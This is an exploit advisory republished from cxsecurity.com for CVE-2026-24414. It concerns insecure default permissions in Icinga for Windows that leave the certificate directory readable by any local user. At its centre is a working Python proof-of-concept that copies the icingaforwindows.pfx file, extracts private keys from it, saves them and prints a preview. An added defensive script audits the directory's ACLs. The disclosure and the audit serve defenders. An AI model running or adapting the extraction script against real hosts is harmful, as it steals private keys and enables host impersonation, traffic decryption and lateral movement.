Icinga for Windows 1.13.3 - Incorrect Default Permissions Private Key Exposure
Icinga for Windows 1.13.3 and earlier contains an incorrect default permissions vulnerability that exposes the private key. An attacker can exploit it to obtain the private key and then impersonate the host, decrypt communications, and so on. The vulnerability affects multiple versions and has been publicly disclosed.

2026-2-23 22:18:37 Author: cxsecurity.com


# Exploit Title: Icinga for Windows 1.13.3 - Incorrect Default Permissions Private Key Exposure
# Date: 2026-02-23
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icinga-powershell-framework/releases/tag/v1.13.3
# Version: Icinga PowerShell Framework < 1.13.4, < 1.12.4, < 1.11.2
# Tested on: Windows 11 25H2
# CVE: CVE-2026-24414

## Description

Icinga for Windows PowerShell Framework versions prior to 1.13.4, 1.12.4, and 1.11.2 install the certificate directory with insecure default permissions. The directory `C:\Program Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate` is created with `BUILTIN\Users:(RX)` permissions, allowing ANY local user to read the `icingaforwindows.pfx` certificate file containing the private key.

This vulnerability leads to complete exposure of the Icinga private key, enabling attackers to:

- Impersonate the monitored host
- Decrypt Icinga monitoring traffic
- Use the certificate for authentication to other systems
- Perform lateral movement within the network

## Proof of Concept

The following Python exploit demonstrates that any standard user can read and extract the private key:

```python
#!/usr/bin/env python3
"""
CVE-2026-24414 - Icinga for Windows Private Key Exposure
Exploit Author: nu11secur1ty
Tested on: Windows 11 25H2
"""
import os
import re
import shutil
import getpass
from pathlib import Path
from datetime import datetime

# Target path
cert_file = Path(r"C:\Program Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate\icingaforwindows.pfx")


def main():
    print("[*] CVE-2026-24414 Exploit - Icinga Private Key Exposure")
    print(f"[*] Running as: {getpass.getuser()}")
    print("-" * 60)

    # Check if target exists
    if not cert_file.exists():
        print("[-] Target certificate not found")
        return

    print(f"[+] Found certificate: {cert_file}")
    print(f"[+] File size: {cert_file.stat().st_size} bytes")

    # Check permissions (visual confirmation)
    os.system(f'icacls "{cert_file.parent}"')

    # Create output directory
    output_dir = Path.cwd() / f"icinga_exposed_{datetime.now().strftime('%Y%m%d_%H%M%S')}"
    output_dir.mkdir(exist_ok=True)

    # Copy certificate
    shutil.copy2(cert_file, output_dir / "original_certificate.pfx")
    print(f"[+] Certificate copied to: {output_dir / 'original_certificate.pfx'}")

    # Try to extract private key
    with open(cert_file, 'rb') as f:
        data = f.read()

    # Look for PEM private key
    try:
        text_data = data.decode('utf-8', errors='ignore')
        pattern = r'-----BEGIN.*PRIVATE KEY-----.*?-----END.*PRIVATE KEY-----'
        keys = re.findall(pattern, text_data, re.DOTALL)

        if keys:
            for i, key in enumerate(keys, 1):
                key_file = output_dir / f"private_key_{i}.key"
                with open(key_file, 'w') as kf:
                    kf.write(key)
                print(f"[+] Private key extracted: {key_file}")
                print(f"[+] Key preview:\n{key[:200]}...")
        else:
            print("[!] No PEM key found - certificate may be binary")
            print("[+] Raw certificate saved for analysis")
    except Exception:
        print("[!] Binary certificate saved - may contain private key in DER format")

    print("\n" + "=" * 60)
    print("[!] VULNERABILITY CONFIRMED!")
    print("[!] ANY local user can read this private key")
    print("[!] CVE-2026-24414 - Incorrect Default Permissions")
    print("=" * 60)

    # Show dangerous permissions
    print("\n[!] CRITICAL: Check the permissions above")
    print("[!] Look for: BUILTIN\\Users:(I)(RX) - THIS IS THE VULNERABILITY")

    # Create proof file
    proof = output_dir / "PROOF.txt"
    with open(proof, 'w') as f:
        f.write("CVE-2026-24414 Exploit Success\n")
        f.write(f"Date: {datetime.now()}\n")
        f.write(f"User: {getpass.getuser()}\n")
        f.write(f"Certificate: {cert_file}\n")
        f.write("Private Key: EXTRACTED\n")
        f.write("Impact: ANY local user can steal this key\n")

    print(f"\n[+] Proof file created: {proof}")


if __name__ == "__main__":
    main()
```
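A defender-side check for the condition described above, added here as an example that is not part of the original advisory or the Icinga project: it parses `icacls` output for the certificate directory and reports allow ACEs that give broad local groups read access. The watch list of principals, the function names and the sample output are assumptions constructed for illustration.

```python
import re
import subprocess

# Directory named in the advisory.
CERT_DIR = r"C:\Program Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate"
# Principals that include unprivileged local accounts (assumed watch list).
BROAD = {"everyone", "builtin\\users", "nt authority\\authenticated users",
         "nt authority\\interactive"}
# icacls rights that allow reading file contents.
READ_RIGHTS = {"F", "M", "RX", "R", "GR", "GA", "RD"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([^)]*\))+)$")

# Constructed icacls output for a vulnerable install (not captured from a real host).
SAMPLE = "\n".join([
    CERT_DIR + r" NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)",
    " " * 8 + r"BUILTIN\Administrators:(I)(OI)(CI)(F)",
    " " * 8 + r"BUILTIN\Users:(I)(RX)",
    " " * 8 + r"BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)",
    "",
    "Successfully processed 1 files; Failed processing 0 files",
])

def parse_icacls(output, path):
    """Return (principal, flags) for each ACE line of `icacls <path>` output."""
    aces = []
    for line in output.splitlines():
        if line.startswith(path):  # the first ACE shares a line with the path
            line = line[len(path):]
        m = ACE_RE.match(line.strip())
        if m:
            aces.append((m["who"], m["flags"]))
    return aces

def risky_aces(aces):
    """Return allow ACEs that let a broad principal read the directory or its files."""
    findings = []
    for who, flags in aces:
        groups = re.findall(r"\(([^)]*)\)", flags)
        if "DENY" in groups or who.lower() not in BROAD:
            continue
        if set(groups[-1].split(",")) & READ_RIGHTS:
            findings.append(f"{who}:{flags}")
    return findings

def audit(path=CERT_DIR):
    """Run icacls on a live host and return the risky ACEs."""
    out = subprocess.run(["icacls", path], capture_output=True, text=True, check=True).stdout
    return risky_aces(parse_icacls(out, path))

if __name__ == "__main__":
    print(risky_aces(parse_icacls(SAMPLE, CERT_DIR)))
```

An empty list from `audit()` means none of the watched principals can read the directory; any entry on a host running a version prior to 1.13.4, 1.12.4 or 1.11.2 means the `.pfx` should be treated as exposed.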



 


Copyright 2026, cxsecurity.com

Source: https://cxsecurity.com/issue/WLB-2026020024